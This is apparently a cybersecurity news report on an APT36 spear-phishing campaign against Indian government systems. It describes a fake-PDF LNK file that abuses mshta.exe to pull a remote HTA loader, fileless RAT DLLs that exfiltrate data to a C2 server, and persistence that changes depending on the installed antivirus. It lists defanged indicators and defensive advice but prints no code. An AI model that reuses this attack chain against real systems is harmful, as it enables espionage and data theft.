The attackers are deploying a weaponized Windows shortcut (LNK) file masquerading as a genuine PDF document to compromise victims’ systems and enable covert data theft and surveillance.
The campaign begins with spear-phishing emails containing ZIP archives titled “Online JLPT Exam Dec 2025.zip.” Within the archive lies a deceptive file named “Online JLPT Exam Dec 2025.pdf.lnk,” designed to appear as a legitimate PDF.
Unlike typical shortcuts (10–12 KB), the malicious LNK file exceeds 2 MB and embeds a full PDF to reduce user suspicion.
When executed, the shortcut abuses the legitimate Windows binary mshta.exe to fetch and run a remote HTA script from innlive[.]in.
This HTA loader operates invisibly, decrypting and executing multiple payloads directly in memory, an advanced “fileless” execution technique that evades traditional antivirus detection.
The staged chain loads two encrypted objects, ReadOnly and WriteOnly, with WriteOnly executing a malicious DLL that functions as a Remote Access Trojan (RAT).
The analyzed DLLs, ki2mtmkl.dll and iinneldc.dll, enable complete remote control of compromised systems.
Once activated, they establish encrypted Command-and-Control (C2) communication with IP 2.56.10[.]86 over TCP port 8621, exfiltrating system details like username, OS version, and installed antivirus software.
The malware can execute remote shell commands, capture screenshots, monitor clipboard activity, manage files, and steal sensitive documents, including Office files and PDFs.
One standout feature of this campaign is its antivirus-aware persistence mechanism. The malware queries Windows Management Instrumentation (WMI) to detect installed security tools and adapt accordingly.
For instance, when Kaspersky is detected, it stores payloads in C:UsersPubliccore and gains persistence via startup shortcuts.
With other antivirus tools, such as Quick Heal or Avast, it alters its methods, creating batch files or registry entries to maintain access.
The campaign’s infrastructure also includes decoy PDFs and multiple fallback payloads, ensuring execution reliability and stealth. All exfiltrated data is Base64-encoded and AES-encrypted before transmission, maintaining confidentiality during network communication.
CYFIRMA attributes this operation to APT36’s continuing espionage focus, emphasizing intelligence gathering over financial gain.
Experts note the actor’s increased sophistication through living-off-the-land techniques, environment-aware persistence, and fileless payload delivery.
Security teams are advised to block LNK attachments, restrict the execution of mshta.exe, and monitor traffic to suspicious domains and IP addresses, such as innlive[.]in, drjagrutichavan[.]com, and 2.56.10[.]86.
Behavior-based defenses and continuous monitoring remain critical against such evolving state-aligned intrusion campaigns.
Follow us on Google News , LinkedIn and X to Get More Instant Updates, Set Cyberpress as a Preferred Source in Google.
The post APT36 Targets Indian Government Systems Using Malicious Windows LNK Files appeared first on Cyber Security News.
For all of you Honkai Star Rail superfans, there's a custom PC built just for…
After a chaotic week following the Justice Department's mid-trial settlement with Live Nation-Ticketmaster, the antitrust…
Looking for a powerful ebike with the speed and range to meet your ambitious needs?…
Don't miss this great opportunity to add to your 4K movie collection. Gruv, one of…
Federal Reserve Chair Jerome Powell speaks during a press conference on Dec. 10, 2025 in…
Federal Reserve Chair Jerome Powell speaks during a press conference on Dec. 10, 2025 in…
This website uses cookies.